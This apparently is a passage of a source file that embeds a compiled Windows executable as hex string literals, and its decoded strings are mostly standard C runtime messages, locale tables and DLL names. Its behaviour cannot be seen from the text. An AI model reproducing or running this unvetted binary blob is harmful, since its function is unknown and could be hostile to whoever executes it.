'<KEY>' \
'000000e8579dffff8b4d0883c40c8bd83b5d0c740b834e0c20b8ffff0000e' \
'b030fb7c15b5f5ec9c3ccff25e8a14100ff251ca241008b5424088d420c8b' \
'4aec33c8e8a235ffffb800304200e9a16cffffff75e8ff75e4e8cb90feff5' \
'959c38b4de4e93894feff8b5424088d420c8b4ae033c8e87135ffffb87031' \
'4200e9706cffff8b5424088d420c8b4ae033c8e85635ffffb8d8314200e95' \
'56cffff8b4df083c104e9f793feff8b4df083c108e94085feff8b5424088d' \
'420c8b4aec33c8e82535ffffb8f8324200e9246cffff8d4ddce9c993feff8' \
'd4de8e9c193feff8d4dcce9b993feff8d4dcce9d488feff8d4de4e9a993fe' \
'ff8d4dd4e9a193feff8d4dc4e99993feff8d4dc4e9b488feff8d4d08e9899' \
'3feff8d4dc4e98193feff8d4dc4e99c88feff8d4d08e97193feff8d4dc4e9' \
'6993feff8d4dc4e98488feff8b5424088d420c8b4ab033c8e89a34ffffb86' \
'0324200e9996bffff8d4d0ce93e93feff8b5424088d420c8b4aec33c8e877' \
'34ffffb830324200e9766bffff8d4de0e91b93feff8d4ddce91393feff8d4' \
'dd8e90b93feff8b5424088d420c8b4ab433c8e84434ffffb8b8334200e943' \
'6bffff8d4df0e9e892feff8d4de8e9e092feff8d4de4e9d892feff8d4de4e' \
'9d092feff8d4de4e9c892feff8d4de4e9c092feff8d4de4e9b892feff8b54' \
'24088d420c8b4ac033c8e8f133ffffb820344200e9f06affff8d8dd0fefff' \
'fe921a2feff8b5424088d829cfeffff8b8a98feffff33c8e8c533ffff83c0' \
'<KEY>' \
'433c8e89d33ffffb82c334200e99c6affff8d4d08e94192feff8d4de8e939' \
'92feff8b5424088d420c8b4ae033c8e87233ffffb87c344200e9716affff8' \
'b5424088d420c8b4ae833c8e85733ffffb804364200e9566affffff7508ff' \
'75e8e8808efeff5959c38b5424088d420c8b4ae433c8e82e33ffffb8a4354' \
'200e92d6affffff7508ff75f0e8578efeff5959c38b5424088d420c8b4aec' \
'33c8e80533ffffb85c364200e9046affff8b4df0e9a991feff8b4df083c10' \
'4e99e91feff8b5424088d420c8b4aec33c8e8d732ffffb818354200e9d669' \
'ffff8d4db0e97b91feff8b5424088d420c8b4aa833c8e8b432ffff8b4afc3' \
'3c8e8aa32ffffb82c374200e9a969ffff8d8dc8f7ffffe94b91feff8d8dcc' \
'f7ffffe94091feff8d8dccf7ffffe93591feff8b5424088d420c8b8ab8f7f' \
'fff33c8e86b32ffff8b4afc33c8e86132ffffb858374200e96069ffff8d8d' \
'9cf7ffffe954c1feff8d8dc8f7ffffe9f790feff8b85b8f7ffff83e0010f8' \
'41200000083a5b8f7fffffe8d8dacf7ffffe9d690feffc38d8da8f7ffffe9' \
'ca90feff8b85b8f7ffff83e0020f841200000083a5b8f7fffffd8d8db0f7f' \
'fffe9a990feffc38b5424088d420c8b8a98f7ffff33c8e8de31ffff8b4afc' \
'33c8e8d431ffffb8e0364200e9d368ffff8d4dd0e99b85feff8d4dd0e9938' \
'5feff8b5424088d420c8b4acc33c8e8a931ffffb8b0344200e9a868ffff8b' \
'5424088d420c8b4ae433c8e88e31ffffb888364200e98d68ffff8b5424088' \
'd420c8b4ae033c8e87331ffffb84c354200e97268ffffff7508ff75f0e89c' \
'8cfeff5959c3ff7508ff75f0e88e8cfeff5959c38b5424088d420c8b4aec3' \
'3c8e83c31ffffb8e4344200e93b68ffff8d8d20ffffffe94381feff8d8d48' \
'ffffffe98facfeff8d8d0cffffffe9c78ffeff8d8d0cffffffe9bc8ffeff8' \
'd8d0cffffffe9b18ffeff8d8d38ffffffe9a68ffeff8d8d3cffffffe99b8f' \
'feff8d8d44ffffffe9908ffeff8d8d1cffffffe9858ffeff8d8d1cffffffe' \
'97a8ffeff8b5424088d820cffffff8b8a08ffffff33c8e8ad30ffffb89837' \
'4200e9ac67ffff8d4de4e9518ffeff8d4de0e9498ffeff8d4de8e9418ffef' \
'f8d4de4e9398ffeff8d4dece9318ffeff8d4df0e9298ffeff8d4de0e9218f' \
'feff8d4de4e9198ffeff8d4dece9118ffeff8b5424088d420c8b4adc33c8e' \
'84a30ffffb848384200e94967ffff8d8dfcfbffffe9eb8efeff8d8de4fbff' \
'ffe94680feff8d8d00fcffffe9d58efeff8d8df8fbffffe9ca8efeff8d8dd' \
'cfbffffe9bf8efeff8d8df8fbffffe9b48efeff8d8db0fbffffe9cc83feff' \
'8d8df8fbffffe99e8efeff8d8d00fcffffe9938efeff8d8ddcfbffffe9888' \
'efeff8d8d00fcffffe97d8efeff8d8db0fbffffe99583feff8d8d00fcffff' \
'e9678efeff8d8dd0fbffffe95c8efeff8d8d00fcffffe9518efeff8d8dd0f' \
'bffffe9468efeff8d8db0fbffffe95e83feff8b5424088d420c8b8aacfbff' \
'ff33c8e8712fffff8b4afc33c8e8672fffffb8c8384200e96666ffff8d4de' \
'ce90b8efeff8d4ddce9038efeff8b5424088d420c8b4ad833c8e83c2fffff' \
'b810384200e93b66ffff8d8de05fffffe9dd8dfeff8b5424088d420c8b8ac' \
'c5fffff33c8e8132fffff8b4af833c8e8092fffffb878394200e90866ffff' \
'8b45ec83e0010f840c0000008365ecfe8b4de4e99d8dfeffc38d4dcce9b0e' \
'7feff8d4dd8e9a8e7feff8d4dc0e9a0e7feff8b5424088d420c8b4abc33c8' \
'e8bd2effffb8d8394200e9bc65ffff8d4df0e9618dfeff8b5424088d420c8' \
'b4aec33c8e89a2effffb8683a4200e99965ffff8d4de0e93e8dfeff8d4de4' \
'e9368dfeff8d4dece92e8dfeff8b45d483e0010f840c0000008365d4fe8d4' \
'dece9168dfeffc38d4dd0e90d8dfeff8b5424088d420c8b4acc33c8e8462e' \
'ffffb81c3a4200e94565ffff8d4df0e9ea8cfeff8d4dace9e28cfeff8d4dc' \
'ce9da8cfeff8d4dd8e9d28cfeff8d4dd8e9ca8cfeff8d4dd0e9c28cfeff8b' \
'45e483e0010f840c0000008365e4fe8d4dd0e9aa8cfeffc38b45e483e0020' \
'f840c0000008365e4fd8d4dd0e9918cfeffc38d4de0e9888cfeff8d4de0e9' \
'808cfeff8d4de0e9788cfeff8b5424088d420c8b8a34ffffff33c8e8ae2df' \
'fffb8983a4200e9ad64ffff8b5424088d420c8b4ae033c8e8932dffffb870' \
'3b4200e99264ffff8b5424088d420c8b4ae833c8e8782dffffb8183b4200e' \
'97764ffff8b4df0e91c8cfeff8b5424088d420c8b4aec33c8e8552dffffb8' \
'f43b4200e95464ffff8b45f083e0010f840c0000008365f0fe8b4dece9e98' \
'<KEY>' \
'8d8dd8fbffffe9c28bfeff8d8ddcfbffffe9b78bfeff8d8dd0fbffffe9ac8' \
'<KEY>' \
'ffffb84c3d4200e9d763ffff8d8dccfbffffe9798bfeff8d8dc0fbffffe96' \
'e8bfeff8d8dc8fbffffe9638bfeff8d8ddcfbffffe9588bfeff8d8dd4fbff' \
'ffe94d8bfeff8d8dd8fbffffe9428bfeff8d8dbcfbffffe9378bfeff8d8dd' \
'8fbffffe92c8bfeff8b5424088d420c8b8ab8fbffff33c8e8622cffff8b4a' \
'fc33c8e8582cffffb8f03e4200e95763ffff8d8dccfffeffe9f98afeff8d8' \
'de4fffeffe9ee8afeff8b85d4fffeff83e0010f841200000083a5d4fffeff' \
'fe8d8de4fffeffe9cd8afeffc38b85d4fffeff83e0020f841200000083a5d' \
'4fffefffd8d8de4fffeffe9ab8afeffc38d8ddcfffeffe99f8afeff8b85d4' \
'fffeff83e0040f841200000083a5d4fffefffb8d8ddcfffeffe97e8afeffc' \
'38d8de0fffeffe9728afeff8b5424088d420c8b8aa4fffeff33c8e8a82bff' \
'ff8b4afc33c8e89e2bffffb8703f4200e99d62ffff8d8d1cf8ffffe93f8af' \
'eff8d8d18f8ffffe9348afeff8b5424088d420c8b8a0cf8ffff33c8e86a2b' \
'ffff8b4afc33c8e8602bffffb8183d4200e95f62ffff8d8dd8fbffffe9018' \
'afeff8d8db0fbffffe9f689feff8d8d9cfbffffe9eb89feff8d8da4fbffff' \
'e9e089feff8d8dbcfbffffe9d589feff8d8da8fbffffe9ca89feff8d8db8f' \
'bffffe9bf89feff8d8db4fbffffe9b489feff8d8dacfbffffe9a989feff8b' \
'5424088d420c8b8a98fbffff33c8e8df2affff8b4afc33c8e8d52affffb82' \
'03c4200e9d461ffff8d4de8e97989feff8d4df0e97189feff8d4ddce96989' \
'feff8d4de0e96189feff8d4de0e95989feff8d4ddce95189feff8b5424088' \
'd420c8b4ad433c8e88a2affffb8883d4200e98961ffff8d4ddce92e89feff' \
'8d4df0e92689feff8d4de4e91e89feff8d4d8ce9afb8feff8d4db4e9a7b8f' \
'eff8d4de0e90689feff8b5424088d420c8b4a8833c8e83f2affffb8103e42' \
'00e93e61ffff8d8ddcbfffffe9e088feff8d8dd4bfffffe9d588feff8d8db' \
'4bfffffe9ca88feff8d8de0bfffffe9bf88feff8d8de0bfffffe9b488feff' \
'8d8de8bfffffe9a988feff8d8de0bfffffe99e88feff8d8dd4bfffffe9938' \
'8feff8d8de8bfffffe98888feff8d8de8bfffffe97d88feff8b5424088d42' \
'0c8b8aacbfffff33c8e8b329ffff8b4afc33c8e8a929ffffb8903c4200e9a' \
'860ffff8d4d88e9e6b7feff8d4db0e9deb7feff8b5424088d420c8b4a8433' \
'c8e87e29ffffb8dc3d4200e97d60ffff8d8d30ffffffe9b8b7feff8d8d58f' \
'fffffe9adb7feff8d4d80e96b0effff8d4dcce90488feff8d4dcce9fc87fe' \
'ff8d4dc8e9f487feff8d4dcce9ec87feff8b5424088d420c8b8a2cffffff3' \
'3c8e82229ffff8b4afc33c8e81829ffffb8643e4200e91760ffff8d4dace9' \
'bc87feff8b5424088d420c8b4a9c33c8e8f528ffff8b4afc33c8e8eb28fff' \
'fb8c03e4200e9ea5fffff8d8d98bfffffe925b7feff8d8dc0bfffffe91ab7' \
'feff8b5424088d828cbfffff8b8a88bfffff33c8e8b428ffff83c00c8b4af' \
'833c8e8a728ffffb808404200e9a65fffff8d8dccfbffffe94887feff8d8d' \
'd0fbffffe93d87feff8d8dc8fbffffe93287feff8b5424088d82c4fbffff8' \
'b8ac0fbffff33c8e86528ffff83c00c8b4af833c8e85828ffffb8cc3f4200' \
'e9575fffff8d4dd8e9fc86feff8d4dd8e9f486feff8d4dd0e9ec86feff8b5' \
'424088d420c8b4ac433c8e82528ffff8b4afc33c8e81b28ffffb8d0404200' \
'e91a5fffff8b85dcfbffff83e0010f841200000083a5dcfbfffffe8b8dd8f' \
'bffffe9a686feffc38b5424088d420c8b8ad0fbffff33c8e8db27ffff8b4a' \
'fc33c8e8d127ffffb8a4404200e9d05effff8b45f083e0010f840c0000008' \
'365f0fe8b4de8e96586feffc38d4dece95c86feff8b5424088d420c8b4ae4' \
'33c8e89527ffffb83c404200e9945effff8d4df0e93986feff8d4dece9318' \
'6feff8b5424088d420c8b4ae833c8e86a27ffffb884414200e9695effff8d' \
'4df0e90e86feff8b5424088d420c8b4adc33c8e84727ffffb8b8414200e94' \
'65effff8d4de4e9eb85feff8d4de8e9e385feff8b5424088d420c8b4adc33' \
'c8e81c27ffffb870404200e91b5effff8d4de8e9c085feff8d4de4e9b885f' \
'eff8d4dece9b085feff8d4dece9a885feff8b5424088d420c8b4adc33c8e8' \
'e126ffffb80c414200e9e05dffff6800604200b974804200e8a085feff683' \
'c9a4100e8eb3effff59c3e8e47efeff684a9a4100a378804200e8d53effff' \
'59c368659a4100e8c93effff59c3685a9a4100e8bd3effff59c3684f9a410' \
'0e8b13effff59c36800604200b984804200e84b85feff68709a4100e8963e' \
'ffff59c3ff1520a14100687e9a4100c705c070420048a34100a3c4704200c' \
'605c870420000e86e3effff59c368889a4100e8623effff59c3b9cc704200' \
'e84c23ffff68939a4100e84c3effff59c38b0d748042008d49f0e91085fef' \
'fe99a04ffffc705b0704200c8a34100c3c705b8704200c8a34100c3c705b4' \
'704200c8a34100c38b0d848042008d49f0e9dc84feffb9c0704200e93a21f' \
'fffc705006042005ca34100c3b9cc704200e94023ffff0000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'00000000000000000000000344902001c49020004490200e6480200c84802' \
'00b4480200a4480200924802007c4802006c4802005448020042480200324' \
'802002048020006480200ec470200d4470200ba470200aa47020098470200' \
'7a4702006c470200dc460200fc460200184702002e4702004447020058470' \
'20000000000105102001a5102002c510200405102004e5102005c51020072' \
'510200825102009c510200b6510200d0510200e0510200bc4b02005a49020' \
'06c4902007c4902008c4902009c490200ae490200c2490200d2490200e049' \
'0200f4490200044a0200144a0200204a02003a4a0200584a0200764a02009' \
'24a0200aa4a0200c24a0200da4a0200ec4a0200fa4a0200104b0200184b02' \
'00244b0200384b02004a4b02005c4b02006a4b0200824b02008e4b0200a04' \
'b0200ac4b0200f0510200ce4b0200e24b0200fa4b02000c4c0200204c0200' \
'364c02004c4c02006a4c0200864c02009e4c0200ac4c0200bc4c0200d04c0' \
'200e24c0200f44c02000e4d0200284d02003c4d02004c4d0200584d020066' \
'4d0200724d0200884d02009e4d0200b84d0200ce4d0200e24d0200fe4d020' \
'0164e0200224e0200384e02004e4e0200764e0200864e02009c4e0200ae4e' \
'0200c44e0200d64e020002510200f4500200e8500200f24e0200004f02000' \
'e4f02001a4f02002c4f0200404f02005c4f02007c4f0200904f0200a04f02' \
'00b04f0200c04f0200d64f0200e44f0200f64f020010500200285002003e5' \
'002004c500200585002006a50020074500200805002008c5002009e500200' \
'ae500200ca50020000000000944602007046020080460200ba460200a4460' \
'200000000009645020086450200000000002046020000000000fa450200e0' \
'450200cc450200b8450200000000005245020038450200684502000000000' \
'03a460200524602000000000000000000f29941001a9a4100269a41008299' \
'41009d994100b3994100bf994100cb994100d799410000000000000000005' \
'cc9400061d74000e9fb40007e0641001554410000000000000000002c0b41' \
'00dc30410003894100cfc9400000000000000000000000000000000000000' \
'0000000000000a9dded54000000000200000042000000f0250200f0150200' \
'00000000a9dded54000000000c00000010000000342602003416020085bc4' \
'000a9bc400046bd4000d2bc4000febb40001dbc40009dbc4000e7bc4000c4' \
'bc40009abc4000debb4000282849d33841d44fb3ecdb99135eae867826420' \
'026bf40008bf2400062616420616c6c6f636174696f6e0000c42642004bbf' \
'40008bf24000102742004bbf40008bf24000602742004bbf40008bf240008' \
'0294200aaad400003e8400003e84000e9ad40001aae4000fbad4000342942' \
'00aaad400037ae40003dae4000e9ad40001aae4000fbad400094294200aaa' \
'd400068ae40006eae4000e9ad40001aae4000fbad4000dc294200aaad4000' \
'9dae4000a3ae4000ceae40001aae4000fbad4000000000000500000008a94' \
'100b70000001ca941001400000028a941006f00000038a94100aa0000004c' \
'a941008e0000004ca941005200000008a94100f303000064a94100f403000' \
'064a94100f503000064a941001000000008a941003700000028a941006409' \
'00004ca941009100000070a941000b01000084a941007000000098a941005' \
'00000001ca9410002000000aca941002700000098a941000c00000008a941' \
'000f00000028a9410001000000c8a941000600000084a941007b00000084a' \
'9410021000000e0a94100d4000000e0a941008300000084a94100e6030000' \
'08a9410008000000f4a941001500000008aa41001100000028aa41006e000' \
'00064a94100610900004ca94100e30300003caa41000e000000f4a9410003' \
'000000aca941001e00000064a94100d504000008aa41001900000064a9410' \
'02000000008a941000400000050aa41001d00000064a941001300000008a9' \
'41001d27000064aa41004027000078aa41004127000088aa41003f270000a' \
'0aa410035270000c0aa410019270000e0aa410045270000f4aa41004d2700' \
'0008ab4100462700001cab41003727000030ab41001e27000050ab4100512' \
'700005cab41003427000070ab41001427000088ab41002627000094ab4100' \
'48270000a8ab410028270000bcab410038270000d0ab41004f270000e0ab4' \
'10042270000f4ab41004427000004ac41004327000014ac41004727000028' \
'ac41003a27000038ac4100492700004cac4100362700005cac41003d27000' \
'06cac41003b27000084ac4100392700009cac41004c270000b0ac41003327' \
'0000bcac4100000000000000000066000000d4ac410064000000f4ac41006' \
'500000004ad4100710000001cad41000700000030ad41002100000048ad41' \
'000e00000060ad4100090000006cad41006800000080ad4100200000008ca' \
'd41006a00000098ad410067000000acad41006b000000ccad41006c000000' \
'e0ad41001200000028aa41006d000000f4ad4100100000004ca9410029000' \
'00070a941000800000014ae4100110000001ca941001b0000002cae410026' \
'00000038a9410028000000c8a941006e0000003cae41006f00000050ae410' \
'02a00000064ae4100190000007cae41000400000088ab41001600000084a9' \
'41001d000000a0ae41000500000064a9410015000000b0ae410073000000c' \
'0ae410074000000d0ae410075000000e0ae410076000000f0ae4100770000' \
'0004af41000a00000014af41007900000028af410027000000e0a94100780' \
'0000030af41007a00000048af41007b00000054af41001c00000098a94100' \
'7c00000068af4100060000007caf41001300000028a9410002000000aca94' \
'1000300000098af410014000000a8af410080000000b8af41007d000000c8' \
'af41007e000000d8af41000c000000f4a9410081000000e8af41006900000' \
'03caa410070000000f8af41000100000010b041008200000028b041008c00' \
'000040b041008500000058b041000d00000008a941008600000064b041008' \
'700000074b041001e0000008cb0410024000000a4b041000b00000008aa41' \
'0022000000c4b041007f000000d8b0410089000000f0b041008b00000000b' \
'141008a00000010b14100170000001cb141001800000050aa41001f000000' \
'3cb14100720000004cb14100840000006cb14100880000007cb1410000000' \
'000000000007065726d697373696f6e2064656e69656400000066696c6520' \
'657869737473006e6f207375636820646576696365000066696c656e616d6' \
'520746f6f206c6f6e67000000646576696365206f72207265736f75726365' \
'206275737900696f206572726f72000000006469726563746f7279206e6f7' \
'420656d70747900696e76616c696420617267756d656e74000000006e6f20' \
'7370616365206f6e2064657669636500006e6f20737563682066696c65206' \
'f72206469726563746f727900000066756e6374696f6e206e6f7420737570' \
'706f7274656400006e6f206c6f636b20617661696c61626c650000006e6f7' \
'420656e6f756768206d656d6f72790000007265736f7572636520756e6176' \
'61696c61626c652074727920616761696e000063726f73732064657669636' \
'5206c696e6b0000006f7065726174696f6e2063616e63656c65640000746f' \
'6f206d616e792066696c6573206f70656e007065726d697373696f6e5f646' \
'56e696564000000616464726573735f696e5f757365000061646472657373' \
'5f6e6f745f617661696c61626c65000000616464726573735f66616d696c7' \
'95f6e6f745f737570706f7274656400000000636f6e6e656374696f6e5f61' \
'<KEY>' \
'57363726970746f7200636f6e6e656374696f6e5f61626f72746564000063' \
'6f6e6e656374696f6e5f726566757365640000636f6e6e656374696f6e5f7' \
'2657365740000000064657374696e6174696f6e5f616464726573735f7265' \
'717569726564000000006261645f6164647265737300686f73745f756e726' \
'561636861626c65000000006f7065726174696f6e5f696e5f70726f677265' \
'7373000000696e74657272757074656400696e76616c69645f617267756d6' \
'56e7400000000616c72656164795f636f6e6e6563746564000000746f6f5f' \
'6d616e795f66696c65735f6f70656e006d6573736167655f73697a6500000' \
'00066696c656e616d655f746f6f5f6c6f6e670000006e6574776f726b5f64' \
'6f776e000000006e6574776f726b5f72657365740000006e6574776f726b5' \
'f756e726561636861626c65006e6f5f6275666665725f7370616365006e6f' \
'5f70726f746f636f6c5f6f7074696f6e00006e6f745f636f6e6e656374656' \
'40000006e6f745f615f736f636b6574000000006f7065726174696f6e5f6e' \
'6f745f737570706f727465640070726f746f636f6c5f6e6f745f737570706' \
'f72746564000077726f6e675f70726f746f636f6c5f747970650074696d65' \
'645f6f75740000006f7065726174696f6e5f776f756c645f626c6f636b000' \
'000616464726573732066616d696c79206e6f7420737570706f7274656400' \
'0000006164647265737320696e20757365000061646472657373206e6f742' \
'0617661696c61626c65000000616c726561647920636f6e6e656374656400' \
'0000617267756d656e74206c69737420746f6f206c6f6e670000617267756' \
'd656e74206f7574206f6620646f6d61696e00006261642061646472657373' \
'006261642066696c652064657363726970746f7200626164206d657373616' \
'7650062726f6b656e207069706500636f6e6e656374696f6e2061626f7274' \
'65640000636f6e6e656374696f6e20616c726561647920696e2070726f677' \
'26573730000636f6e6e656374696f6e20726566757365640000636f6e6e65' \
'6374696f6e2072657365740000000064657374696e6174696f6e206164647' \
'26573732072657175697265640000000065786563757461626c6520666f72' \
'6d6174206572726f720066696c6520746f6f206c617267650000686f73742' \
'0756e726561636861626c65000000006964656e7469666965722072656d6f' \
'7665640000696c6c6567616c20627974652073657175656e6365000000696' \
'e617070726f70726961746520696f20636f6e74726f6c206f706572617469' \
'6f6e0000696e76616c6964207365656b00000000697320612064697265637' \
'46f727900006d6573736167652073697a65000000006e6574776f726b2064' \
'6f776e000000006e6574776f726b2072657365740000006e6574776f726b2' \
'0756e726561636861626c65006e6f20627566666572207370616365006e6f' \
'206368696c642070726f63657373000000006e6f206c696e6b006e6f206d6' \
'5737361676520617661696c61626c65000000006e6f206d65737361676500' \
'006e6f2070726f746f636f6c206f7074696f6e00006e6f2073747265616d2' \
'07265736f7572636573006e6f207375636820646576696365206f72206164' \
'64726573730000006e6f20737563682070726f63657373006e6f742061206' \
'469726563746f7279006e6f74206120736f636b6574000000006e6f742061' \
'2073747265616d000000006e6f7420636f6e6e65637465640000006e6f742' \
'0737570706f727465640000006f7065726174696f6e20696e2070726f6772' \
'6573730000006f7065726174696f6e206e6f74207065726d6974746564006' \
'f7065726174696f6e206e6f7420737570706f72746564006f706572617469' \
'6f6e20776f756c6420626c6f636b0000006f776e657220646561640000707' \
'26f746f636f6c206572726f72000070726f746f636f6c206e6f7420737570' \
'706f72746564000072656164206f6e6c792066696c652073797374656d000' \
'0007265736f7572636520646561646c6f636b20776f756c64206f63637572' \
'000000726573756c74206f7574206f662072616e6765007374617465206e6' \
'f74207265636f76657261626c6500000073747265616d2074696d656f7574' \
'0000746578742066696c652062757379000074696d6564206f75740000007' \
'46f6f206d616e792066696c6573206f70656e20696e2073797374656d0000' \
'00746f6f206d616e79206c696e6b730000746f6f206d616e792073796d626' \
'f6c6963206c696e6b206c6576656c7300000076616c756520746f6f206c61' \
'7267650077726f6e672070726f746f636f6c207479706500b027420094c04' \
'00058714200a87142001c000d000d000a0000a635002f003f00009500a447' \
'00e047e047e07700974800e048e048e08d00984900e049e049e08600994b0' \
'0e04be04be073009b4d00e04de04de074009d4f00e04fe04fe075009f5000' \
'e050e050e09100a05100e051e051e07600a15200e052e052e09200a25300e' \
'053e053e09300a300000000000000001b001b001b00000131002100000000' \
'783200400000030079330023000000007a340024000000007b35002500000' \
'0007c36005e001e00007d370026000000007e38002a000000007f39002800' \
'0000008030002900000000812d005f001f0000823d002b000000008308000' \
'8007f00000e0900000f0094000f7100510011000010770057001700001165' \
'0045000500001272005200120000137400540014000014790059001900001' \
'5750055001500001669004900090000176f004f000f000018700050001000' \
'00195b007b001b00001a5d007d001d00001b0d000d000a00001c000000000' \
'0000000610041000100001e730053001300001f6400440004000020660046' \
'0006000021670047000700002268004800080000236a004a000a0000246b0' \
'04b000b0000256c004c000c0000263b003a00000000272700220000000028' \
'60007e000000002900000000000000005c007c001c0000007a005a001a000' \
'02c780058001800002d630043000300002e760056001600002f6200420002' \
'0000306e004e000e0000316d004d000d0000322c003c00000000332e003e0' \
'0000000342f003f000000003500000000000000002a000000720000000000' \
'00000000000020002000200020000000000000000000003b0054005e00680' \
'03c0055005f0069003d00560060006a003e00570061006b003f0058006200' \
'6c004000590063006d0041005a0064006e0042005b0065006f0043005c006' \
'600700044005d006700710000000000000000000000000000000000473700' \
'0077000000483800008d0000004939000084000000002d0000000000004b3' \
'400007300000000350000000000004d36000074000000002b000000000000' \
'4f31000075000000503200009100000051330000760000005230000092000' \
'000532e000093000000000000000000000000000000000000000000000000' \
'0000e085e087e089e08be086e088e08ae08c526f496e697469616c697a650' \
'000000063006f006d0062006100730065002e0064006c006c000000526f55' \
'6e696e697469616c697a650000410044005600410050004900330032002e0' \
'044004c004c000000000053797374656d46756e6374696f6e303336000000' \
'f82742000cf240008bf24000556e6b6e6f776e20657863657074696f6e000' \
'00063736de001000000000000000000000003000000200593190000000000' \
'00000098b54100a4b54100b0b54100bcb541006a0061002d004a005000000' \
'07a0068002d0043004e0000006b006f002d004b00520000007a0068002d00' \
'54005700000053756e004d6f6e00547565005765640054687500467269005' \
'361740053756e64617900004d6f6e64617900005475657364617900576564' \
'6e65736461790000005468757273646179000000004672696461790000536' \
'1747572646179000000004a616e00466562004d617200417072004d617900' \
'4a756e004a756c0041756700536570004f6374004e6f7600446563004a616' \
'e75617279004665627275617279000000004d61726368000000417072696c' \
'0000004a756e65000000004a756c790000000041756775737400005365707' \
'4656d6265720000004f63746f626572004e6f76656d626572000000004465' \
'63656d62657200000000414d0000504d00004d4d2f64642f7979000000006' \
'46464642c204d4d4d4d2064642c20797979790048483a6d6d3a7373000000' \
'00530075006e0000004d006f006e000000540075006500000057006500640' \
'0000054006800750000004600720069000000530061007400000053007500' \
'6e00640061007900000000004d006f006e006400610079000000000054007' \
'5006500730064006100790000005700650064006e00650073006400610079' \
'0000005400680075007200730064006100790000000000460072006900640' \
'0610079000000000053006100740075007200640061007900000000004a00' \
'61006e00000046006500620000004d0061007200000041007000720000004' \
'd006100790000004a0075006e0000004a0075006c00000041007500670000' \
'0053006500700000004f006300740000004e006f007600000044006500630' \
'000004a0061006e0075006100720079000000460065006200720075006100' \
'72007900000000004d006100720063006800000041007000720069006c000' \
'0004a0075006e006500000000004a0075006c007900000000004100750067' \
'0075007300740000000000530065007000740065006d00620065007200000' \
'04f00630074006f0062006500720000004e006f00760065006d0062006500' \
'72000000000044006500630065006d006200650072000000000041004d000' \
'000000050004d00000000004d004d002f00640064002f0079007900000000' \
'0064006400640064002c0020004d004d004d004d002000640064002c00200' \
'079007900790079000000480048003a006d006d003a007300730000000000' \
'65006e002d00550053000000000000000102030405060708090a0b0c0d0e0' \
'f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d' \
'2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4' \
'c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a' \
'6b6c6d6e6f707172737475767778797a7b7c7d7e7f006b00650072006e006' \
'5006c00330032002e0064006c006c0000000000466c73416c6c6f63000000' \
'00466c734672656500466c7347657456616c756500466c7353657456616c7' \
'56500496e697469616c697a65437269746963616c53656374696f6e457800' \
'43726561746553656d6170686f72654578570000536574546872656164537' \
'461636b47756172616e74656500437265617465546872656164706f6f6c54' \
'696d6572000000536574546872656164706f6f6c54696d657200005761697' \
'4466f72546872656164706f6f6c54696d657243616c6c6261636b7300436c' \
'6f7365546872656164706f6f6c54696d65720000000043726561746554687' \
'2656164706f6f6c5761697400000000536574546872656164706f6f6c5761' \
'6974000000436c6f7365546872656164706f6f6c5761697400466c7573685' \
'0726f6365737357726974654275666665727300000000467265654c696272' \
'6172795768656e43616c6c6261636b52657475726e7300004765744375727' \
'2656e7450726f636573736f724e756d6265720000004765744c6f67696361' \
'6c50726f636573736f72496e666f726d6174696f6e0000437265617465537' \
'96d626f6c69634c696e6b570053657444656661756c74446c6c4469726563' \
'746f7269657300000000456e756d53797374656d4c6f63616c65734578004' \
'36f6d70617265537472696e6745780047657444617465466f726d61744578' \
'004765744c6f63616c65496e666f45780047657454696d65466f726d61744' \
'578004765745573657244656661756c744c6f63616c654e616d6500000000' \
'497356616c69644c6f63616c654e616d650000004c434d6170537472696e6' \
'7457800000047657443757272656e745061636b616765496400286e756c6c' \
'2900000000000006000006000100001000030600060210044545450505050' \
'5053530005000000000282038505807080037303057500700002020080000' \
'0000086068606060600000787078787878080708000007000808080000080' \
'0080007080000006d00730063006f007200650065002e0064006c006c0000' \
'00436f724578697450726f63657373000043004f004e0049004e002400000' \
'0000000000000050000c00b000000000000001d0000c00400000000000000' \
'960000c004000000000000008d0000c008000000000000008e0000c008000' \
'000000000008f0000c00800000000000000900000c0080000000000000091' \
'0000c00800000000000000920000c00800000000000000930000c00800000' \
'000000000b40200c00800000000000000b50200c008000000000000000c00' \
'0000900000000300000009000000520036003000300038000d000a002d002' \
'0006e006f007400200065006e006f00750067006800200073007000610063' \
'006500200066006f007200200061007200670075006d0065006e007400730' \
'00d000a00000000000000520036003000300039000d000a002d0020006e00' \
'6f007400200065006e006f007500670068002000730070006100630065002' \
'00066006f007200200065006e007600690072006f006e006d0065006e0074' \
'000d000a000000520036003000310030000d000a002d002000610062006f0' \
'07200740028002900200068006100730020006200650065006e0020006300' \
'61006c006c00650064000d000a0000000000520036003000310036000d000' \
'a002d0020006e006f007400200065006e006f007500670068002000730070' \
'00610063006500200066006f0072002000740068007200650061006400200' \
'064006100740061000d000a000000520036003000310037000d000a002d00' \
'200075006e006500780070006500630074006500640020006d0075006c007' \
'400690074006800720065006100640020006c006f0063006b002000650072' \
'0072006f0072000d000a000000000000000000520036003000310038000d0' \
'00a002d00200075006e006500780070006500630074006500640020006800' \
'65006100700020006500720072006f0072000d000a0000000000000000005' \
'20036003000310039000d000a002d00200075006e00610062006c00650020' \
'0074006f0020006f00700065006e00200063006f006e0073006f006c00650' \
'020006400650076006900630065000d000a00000000000000000052003600' \
'3000320034000d000a002d0020006e006f007400200065006e006f0075006' \
'7006800200073007000610063006500200066006f00720020005f006f006e' \
'0065007800690074002f00610074006500780069007400200074006100620' \
'06c0065000d000a000000000000000000520036003000320035000d000a00' \
'2d002000700075007200650020007600690072007400750061006c0020006' \
'60075006e006300740069006f006e002000630061006c006c000d000a0000' \
'0000000000520036003000320036000d000a002d0020006e006f007400200' \
'065006e006f00750067006800200073007000610063006500200066006f00' \
'7200200073007400640069006f00200069006e0069007400690061006c006' \
'9007a006100740069006f006e000d000a0000000000000000005200360030' \
